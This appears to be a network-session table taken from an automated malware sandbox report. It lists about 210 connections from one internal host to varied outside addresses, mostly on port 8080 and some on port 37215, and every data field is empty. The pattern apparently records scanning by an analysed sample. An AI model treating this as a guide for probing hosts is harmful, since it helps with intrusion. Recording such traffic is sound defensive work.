                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10056192.168.2.2344422190.242.21.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10057192.168.2.2347422141.244.33.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10058192.168.2.2355320159.150.125.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10059192.168.2.2358356192.201.180.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10060192.168.2.235189231.251.175.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10061192.168.2.234555070.58.37.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10062192.168.2.234218260.62.27.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10063192.168.2.235859450.141.217.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10064192.168.2.2339260181.162.41.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10065192.168.2.2342338144.201.29.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10066192.168.2.2338600121.37.200.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10067192.168.2.234817078.194.236.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10068192.168.2.233868836.188.118.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10069192.168.2.2345814206.16.179.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10070192.168.2.2359718172.5.233.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10071192.168.2.2353756154.150.83.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10072192.168.2.2343800123.209.222.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10073192.168.2.233335454.155.248.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10074192.168.2.2334554197.158.29.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10075192.168.2.2357302206.191.192.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10076192.168.2.2338308106.96.161.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10077192.168.2.2343276206.109.248.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10078192.168.2.234859218.197.48.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10079192.168.2.2353350125.250.177.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10080192.168.2.2342696113.18.218.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10081192.168.2.2359412138.127.206.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10082192.168.2.236083872.51.222.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10083192.168.2.2340786155.12.80.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10084192.168.2.2356508120.76.123.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10085192.168.2.2334062197.60.23.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10086192.168.2.235789618.57.53.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10087192.168.2.234316670.94.84.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10088192.168.2.2337874195.160.131.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10089192.168.2.235876217.108.83.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10090192.168.2.233420882.59.13.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10091192.168.2.2336042216.171.84.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10092192.168.2.2344568128.247.249.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10093192.168.2.2333764126.163.78.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10094192.168.2.234281646.254.194.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10095192.168.2.2332978182.41.103.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10096192.168.2.234809477.98.111.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10097192.168.2.2346364202.7.62.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10098192.168.2.235050881.32.180.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10099192.168.2.2358542109.149.152.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10100192.168.2.2349452143.118.164.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10101192.168.2.2336498151.34.121.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10102192.168.2.2338386108.198.173.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10103192.168.2.235937817.219.167.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10104192.168.2.2347782164.31.128.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10105192.168.2.2355452113.112.112.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10106192.168.2.2360882148.122.191.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10107192.168.2.235617652.156.177.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10108192.168.2.234014466.8.74.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10109192.168.2.23501308.239.63.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10110192.168.2.233895462.121.97.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10111192.168.2.2338412197.56.23.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10112192.168.2.236090841.8.179.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10113192.168.2.2341216197.151.29.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10114192.168.2.2351064203.68.156.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10115192.168.2.2357132197.157.255.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10116192.168.2.2348326107.188.70.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10117192.168.2.2355146221.192.19.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10118192.168.2.234143413.10.127.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10119192.168.2.233304424.101.98.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10120192.168.2.2359882178.106.137.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10121192.168.2.234562057.163.2.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10122192.168.2.235086432.90.87.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10123192.168.2.2357402119.224.14.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10124192.168.2.23442348.72.110.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10125192.168.2.233938832.12.41.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10126192.168.2.23476929.104.198.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10127192.168.2.2349500183.104.147.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10128192.168.2.233831212.47.37.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10129192.168.2.2344232151.58.195.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10130192.168.2.233363652.112.189.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10131192.168.2.2348240164.86.61.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10132192.168.2.2355408193.240.218.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10133192.168.2.2350928144.106.3.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10134192.168.2.2346090166.201.90.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10135192.168.2.234121095.172.10.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10136192.168.2.2339404143.31.169.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10137192.168.2.2336432221.207.237.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10138192.168.2.234812642.29.212.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10139192.168.2.2341234182.164.1.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10140192.168.2.233785643.97.68.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10141192.168.2.2343392160.114.200.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10142192.168.2.235197818.6.42.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10143192.168.2.2345330125.52.175.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10144192.168.2.2347462135.3.30.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10145192.168.2.235261247.189.193.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10146192.168.2.2335396174.156.208.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10147192.168.2.2337648108.255.239.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10148192.168.2.2337030121.232.55.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10149192.168.2.234304014.80.52.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10150192.168.2.2347956163.24.231.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10151192.168.2.2350522103.180.253.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10152192.168.2.2355848159.26.205.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10153192.168.2.2355278176.95.255.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10154192.168.2.234505414.69.221.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10155192.168.2.2335572138.124.7.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10156192.168.2.233843273.164.69.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10157192.168.2.2352896147.111.43.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10158192.168.2.2343918201.97.95.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10159192.168.2.233997892.229.150.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10160192.168.2.2340022176.221.118.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10161192.168.2.2359762126.216.255.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10162192.168.2.234552054.171.188.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10163192.168.2.2358372176.239.36.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10164192.168.2.233328239.58.64.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10165192.168.2.2335578120.8.98.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10166192.168.2.233941618.121.86.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10167192.168.2.2337624199.62.92.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10168192.168.2.2337464203.248.145.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10169192.168.2.2337434157.216.3.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10170192.168.2.2340664120.123.82.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10171192.168.2.2339026126.189.242.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10172192.168.2.2352832109.124.244.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10173192.168.2.2355002179.175.178.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10174192.168.2.2340552165.107.167.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10175192.168.2.2339898118.217.33.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10176192.168.2.233383620.18.27.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10177192.168.2.2342652175.74.91.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10178192.168.2.2354810197.178.126.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10179192.168.2.2348808121.118.178.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10180192.168.2.2348308121.254.110.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10181192.168.2.233362864.64.235.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10182192.168.2.234604417.44.31.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10183192.168.2.233598043.210.104.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10184192.168.2.233659214.186.91.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10185192.168.2.2332868123.54.177.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10186192.168.2.235941094.80.131.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10187192.168.2.234283079.241.128.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10188192.168.2.2358260178.27.250.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10189192.168.2.235031875.209.85.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10190192.168.2.2356508193.186.172.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10191192.168.2.2339044131.73.9.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192192.168.2.2360308139.45.132.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10193192.168.2.234348258.210.133.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10194192.168.2.2339616158.130.140.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10195192.168.2.233603083.160.161.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10196192.168.2.2336070161.75.211.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10197192.168.2.2333802193.232.27.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10198192.168.2.2339702156.152.53.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10199192.168.2.2353172219.116.253.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10200192.168.2.23392105.224.127.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10201192.168.2.2345242100.201.221.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10202192.168.2.235219827.127.173.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10203192.168.2.234820863.107.5.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10204192.168.2.235043881.32.31.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10205192.168.2.233991267.101.107.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10206192.168.2.233640695.215.208.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10207192.168.2.2335288195.140.170.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10208192.168.2.2359510158.45.133.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10209192.168.2.2355724137.39.164.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10210192.168.2.2334692124.232.137.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10211192.168.2.234102061.163.63.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10212192.168.2.2352104164.38.3.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10213192.168.2.2338358145.146.93.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10214192.168.2.2337746100.207.0.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10215192.168.2.233984261.134.105.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10216192.168.2.2343360140.38.211.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10217192.168.2.235136053.26.96.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10218192.168.2.235830679.94.142.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10219192.168.2.2344546101.95.196.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10220192.168.2.2338048123.17.188.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10221192.168.2.2335962211.136.55.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10222192.168.2.234195681.64.55.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10223192.168.2.234712052.76.62.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10224192.168.2.234388451.245.61.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10225192.168.2.2350892220.108.193.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10226192.168.2.236072482.110.110.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10227192.168.2.2360702138.21.229.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10228192.168.2.2351570167.227.87.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10229192.168.2.2333758204.73.9.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10230192.168.2.2358908109.46.137.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10231192.168.2.2337616187.63.26.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10232192.168.2.234389266.102.14.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10233192.168.2.234559278.191.103.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10234192.168.2.2353850113.119.170.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10235192.168.2.23353582.40.142.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10236192.168.2.2347872106.148.80.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10237192.168.2.235964831.47.231.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10238192.168.2.2334688210.222.165.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10239192.168.2.2345018100.45.82.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10240192.168.2.234580489.247.112.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10241192.168.2.2355114105.236.250.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10242192.168.2.2342922134.120.17.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10243192.168.2.23378365.26.187.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10244192.168.2.2344196172.88.100.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10245192.168.2.233903252.16.157.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10246192.168.2.2346422143.231.189.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10247192.168.2.2345710218.159.166.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10248192.168.2.2353668130.218.0.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10249192.168.2.2333302223.192.0.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10250192.168.2.235143644.159.233.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10251192.168.2.2342380153.72.164.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10252192.168.2.2335956133.146.132.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10253192.168.2.2351130119.207.57.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10254192.168.2.2341316216.91.244.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10255192.168.2.2352572142.45.164.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10256192.168.2.2355988116.207.107.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10257192.168.2.2357370112.19.186.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10258192.168.2.235731842.126.109.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10259192.168.2.2336658179.129.32.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10260192.168.2.234196696.194.224.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10261192.168.2.234843054.87.178.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10262192.168.2.235513451.25.12.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10263192.168.2.2336016199.150.238.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10264192.168.2.2351646154.189.190.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10265192.168.2.2353036199.96.112.1388080
                                                        TimestampBytes transferredDirectionData


